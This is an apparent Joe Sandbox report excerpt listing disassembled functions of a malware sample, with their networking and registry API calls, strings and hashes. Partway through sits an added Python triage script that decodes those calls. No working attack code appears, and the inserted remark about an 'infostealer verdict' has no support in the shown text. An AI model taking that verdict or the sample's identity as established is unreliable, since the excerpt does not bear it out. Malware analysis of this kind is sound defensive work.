                                          Control-flow Graph (rendered graph not captured in this text; the node/edge list covers basic blocks 1d6fa0 through 1d7346, with calls to the internal routine at 1dd7f0, to select and, in three blocks, to __WSAFDIsSet)
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 837082a8d244d90011d01ba18bfd7951b405cbfe5cb2110e1d98c7cadfb9fecf
                                          • Instruction ID: c8c2ca137ed6c760839f77afb3261912e6504c48919f434c42dd170553d00a7b
                                          • Opcode Fuzzy Hash: 837082a8d244d90011d01ba18bfd7951b405cbfe5cb2110e1d98c7cadfb9fecf
                                          • Instruction Fuzzy Hash: C891F03160C34A4BD7358A2888D47BBB2D5FFC5764F548B2EE8A9422D4FB75AC40D681

                                          Control-flow Graph (rendered graph not captured in this text; the node/edge list covers basic blocks 28b180 through 28b589, with a call to getsockname and to the internal routines at 28af30, 28b020, 28b060, 28b590, 28b660, 28b770, 28b870 and 548b00)
                                          APIs
                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 0028B2B6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: getsockname
                                          • String ID: ares__sortaddrinfo.c$cur != NULL
                                          • API String ID: 3358416759-2430778319
                                          • Opcode ID: cc9539f4c66383c93b945f775430b507412d015b5aaa518290fc7f188625ad21
                                          • Instruction ID: d59fbc907c88c61ce212c555022bb91f618da187adac79aff94d16c3b4006f69
                                          • Opcode Fuzzy Hash: cc9539f4c66383c93b945f775430b507412d015b5aaa518290fc7f188625ad21
                                          • Instruction Fuzzy Hash: 66C18F396163059FD719EF24C891A6A77E1FF88304F44886CE8498B3E2DB34ED55CB81
                                          APIs
                                          • recv.WS2_32(000000FF,00276F4E,000000FF,00000000,00000000,000000FF,00276F4E,000000FF,?,00000000,?), ref: 0028A8AF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: recv
                                          • String ID:
                                          • API String ID: 1507349165-0
                                          • Opcode ID: 236d0902a9c238bc2fbc09ae54f956c4660593a8c8b644978c6eed93953b423b
                                          • Instruction ID: 295958ccc8ea7bc48f04c356b032b1a8a116884709a97fc50030165b95d2e148
                                          • Opcode Fuzzy Hash: 236d0902a9c238bc2fbc09ae54f956c4660593a8c8b644978c6eed93953b423b
                                          • Instruction Fuzzy Hash: 42F01C76B157216BE5249A18EC05FABF369EBC4B20F148A19B944672888760BC1187E2
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0027AA19
                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0027AA4C
                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0027AA97
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0027AAE9
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0027AB30
                                          • RegCloseKey.KERNELBASE(?), ref: 0027AB6A
                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0027AB82
                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0027AC46
                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0027AD0A
                                          • RegEnumKeyExA.KERNELBASE ref: 0027AD8D
                                          • RegCloseKey.KERNELBASE(?), ref: 0027ADD9
                                          • RegEnumKeyExA.KERNELBASE ref: 0027AE08
                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0027AE2A
                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0027AE54
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0027AF63
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0027AFB2
                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0027B072
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: QueryValue$Open$CloseEnum
                                          • String ID: ;m}$DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$ck}
                                          • API String ID: 4217438148-1944670311
                                          • Opcode ID: 81c3226d45951e61349359ca3c3f970d0945772ecc331e9e340de1fa30cf3f4d
                                          • Instruction ID: 0a8aa5e9ae138c5b0785f7cb7d5ffe8cf580d23deaf7950553ec5a88f90d5a9f
                                          • Opcode Fuzzy Hash: 81c3226d45951e61349359ca3c3f970d0945772ecc331e9e340de1fa30cf3f4d
                                          • Instruction Fuzzy Hash: 3572D0B1614302ABE3109F24CC81F6B7BE8AF85754F148828F989DB291E7B5E954CB53
                                          APIs
                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 001FA831
                                          Strings
                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 001FADAC
                                          • Could not set TCP_NODELAY: %s, xrefs: 001FA871
                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 001FAD0A
                                          • bind failed with errno %d: %s, xrefs: 001FB080
                                          • Trying %s:%d..., xrefs: 001FA7C2, 001FA7DE
                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 001FAE1F
                                          • cf-socket.c, xrefs: 001FA5CD, 001FA735
                                          • Local port: %hu, xrefs: 001FAF28
                                          • Trying [%s]:%d..., xrefs: 001FA689
                                          • @, xrefs: 001FAC42
                                          • Local Interface %s is ip %s using address family %i, xrefs: 001FAE60
                                          • Bind to local port %d failed, trying next, xrefs: 001FAFE5
                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 001FA6CE
                                          • cf_socket_open() -> %d, fd=%d, xrefs: 001FA796
                                          • @, xrefs: 001FA8F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: setsockopt
                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                          • API String ID: 3981526788-2373386790
                                          • Opcode ID: 24ac42749133fc48062a6167c4fc8e848234eff0eb29468b08a50c83061be91b
                                          • Instruction ID: 79a14b10dfef8064b60874d0f10d94225c27bcce44616c854b8d8d3ce410210b
                                          • Opcode Fuzzy Hash: 24ac42749133fc48062a6167c4fc8e848234eff0eb29468b08a50c83061be91b
                                          • Instruction Fuzzy Hash: 7E62F3B1508345ABE724CF24C886BBBB7E4AF90314F444919FA8C97292E775E845CB93
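The API lists in the entries above (the RegOpenKeyExA/RegQueryValueExA reads of SearchList, Domain, DhcpDomain and DatabasePath under Tcpip\Parameters, the DNSClient policy keys and the per-interface subkeys, plus the setsockopt and getsockname calls) are quicker to triage once the raw constants are decoded. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the report's `Api.Module(args), ref: addr` notation (the sample input is constructed from lines shown in this section), decodes the HKEY and access-mask constants and the setsockopt level/option pair, and attributes each value query to the most recently opened key. That attribution is a heuristic, because the report prints handles as `?`; the hive and rights tables are Windows constants, and the names `parse_api_lines`, `decode_call` and `registry_reads` are this example's own. Triage caveat: the strings cf-socket.c and ares__sortaddrinfo.c in the neighbouring entries identify statically linked libcurl and c-ares code, and this set of keys and values closely matches what the c-ares resolver reads on Windows for DNS suffixes and the hosts-file path, so this registry access pattern on its own is consistent with resolver initialization rather than with data theft; the infostealer verdict rests on other signatures in the report.

```python
import re
from dataclasses import dataclass

# Windows constants (HKEY pseudo-handles, registry access masks, socket options).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_RIGHTS = {0x20019: "KEY_READ", 0x1: "KEY_QUERY_VALUE",
              0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
SOCKOPTS = {(6, 1): "IPPROTO_TCP/TCP_NODELAY"}

# Report notation: Api.Module(arg,arg,...), ref: ADDRESS  (args may be absent)
API_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Constructed sample: API lines copied from the entries above.
SAMPLE_API_LINES = r"""
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0027AA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0027AA4C
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0027AB30
RegCloseKey.KERNELBASE(?), ref: 0027AB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0027AB82
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0027AD0A
RegEnumKeyExA.KERNELBASE ref: 0027AD8D
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0027AE2A
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0027B072
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00289946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00289974
RegCloseKey.KERNELBASE(?), ref: 0028998B
setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 001FA831
getsockname.WS2_32(-00000020,-00000020,?), ref: 0028B2B6
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int


def _hex(arg):
    """Parse a report argument as hex; '?' and string literals yield None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_api_lines(text):
    """Parse report API lines (a leading bullet is tolerated) into ApiCall records."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_RE.match(line) if line else None
        if not m:
            continue
        args = m.group("args")
        calls.append(ApiCall(m.group("api"), m.group("module"),
                             [a.strip() for a in args.split(",")] if args else [],
                             int(m.group("ref"), 16)))
    return calls


def decode_call(c):
    """Human-readable form of the call, decoding the constants the report prints raw."""
    a = c.args
    if c.api == "RegOpenKeyExA" and len(a) >= 4:
        hive = HIVES.get(_hex(a[0]), a[0])
        rights = KEY_RIGHTS.get(_hex(a[3]), a[3])
        return f"open {hive}\\{a[1]} ({rights})"
    if c.api == "RegQueryValueExA" and len(a) >= 2:
        return f"query value '{a[1]}'"
    if c.api == "RegCloseKey":
        return "close key"
    if c.api == "setsockopt" and len(a) >= 3:
        key = (_hex(a[1]), _hex(a[2]))
        return f"setsockopt {SOCKOPTS.get(key, key)}"
    return c.api


def registry_reads(calls):
    """Map each opened key to the value names queried under it.

    Heuristic: handles are printed as '?', so a query is attributed to the most
    recently opened key; an open with a '?' subkey is treated as a subkey enumerated
    from the key that is currently open (the RegEnumKeyExA loop in the report).
    """
    reads, current = {}, None
    for c in calls:
        if c.api == "RegOpenKeyExA" and len(c.args) >= 2:
            if c.args[1] == "?":
                current = f"{current or '?'}\\<enumerated subkey>"
            else:
                current = f"{HIVES.get(_hex(c.args[0]), c.args[0])}\\{c.args[1]}"
            reads.setdefault(current, set())
        elif c.api == "RegQueryValueExA" and len(c.args) >= 2 and current:
            reads[current].add(c.args[1])
        elif c.api == "RegCloseKey":
            current = None
    return {k: sorted(v) for k, v in reads.items()}


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_API_LINES)
    for c in calls:
        print(f"{c.ref:08X}  {decode_call(c)}")
    for key, values in registry_reads(calls).items():
        print(f"{key}: {values}")
```

Running it shows the Tcpip\Parameters key being read for SearchList, Domain and DatabasePath, the DNSClient policy keys opened with KEY_READ, DhcpDomain read from an enumerated interface subkey, and the setsockopt call decoded as IPPROTO_TCP/TCP_NODELAY, which matches the "Could not set TCP_NODELAY" string in the same function.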

                                          Control-flow Graph (rendered graph not captured in this text; the node/edge list covers basic blocks 289740 through 28a070, with calls to RegOpenKeyExA, RegQueryValueExA and RegCloseKey and to numerous internal routines in the 0x27xxxx, 0x28xxxx and 0x548xxx ranges)
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00289946
                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00289974
                                          • RegCloseKey.KERNELBASE(?), ref: 0028998B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                          • API String ID: 3677997916-4129964100
                                          • Opcode ID: 6f0ef4b9f8833045d1f6809c2d71dda190a3513ce3f3ed889fda4b2fba834558
                                          • Instruction ID: e4fd6e655ac34d3f69ed4de7de41ff5119f145c8139e1f0e612a90d318fb2572
                                          • Opcode Fuzzy Hash: 6f0ef4b9f8833045d1f6809c2d71dda190a3513ce3f3ed889fda4b2fba834558
                                          • Instruction Fuzzy Hash: C032C8B9925202ABEB11BF20AC42A2B7694AF55318F0C4474FD0D96293F731ED74DB63

                                          Control-flow Graph (function entry 0x1f8b50; API calls on the graph: connect, SleepEx; the executed / not executed block colouring and the node/edge list are not reproduced here)
                                          APIs
                                          • connect.WS2_32(?,?,00000001), ref: 001F8C30
                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 001F8CF3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: Sleepconnect
                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                          • API String ID: 238548546-879669977
                                          • Opcode ID: 77b028f39d585c489644e23dd7893d0f9aea7e843b7593cef102631dabd18421
                                          • Instruction ID: 5ee25620d72af15830a173a9abec697c27b0483a4ef55e5be03a03381aca3d2a
                                          • Opcode Fuzzy Hash: 77b028f39d585c489644e23dd7893d0f9aea7e843b7593cef102631dabd18421
                                          • Instruction Fuzzy Hash: 78B1C17060430AAFDB14CF24C885BB6B7E0AF55314F18852DE96D4B2D2DB71EC54C762

                                          Control-flow Graph (function entry 0x1c2f17; API calls on the graph: RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA, RegCloseKey; the executed / not executed block colouring and the node/edge list are not reproduced here)
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: CloseEnumOpen
                                          • String ID: *z
                                          • API String ID: 1332880857-3975569452
                                          • Opcode ID: dc9319bf54cc4c553702d74e2d57fc953377af40f12bf83a079890cff356d559
                                          • Instruction ID: 59ff835b742a16e7ec742b48f6084a2e76644ffdccb172346461a2ae2b0a8244
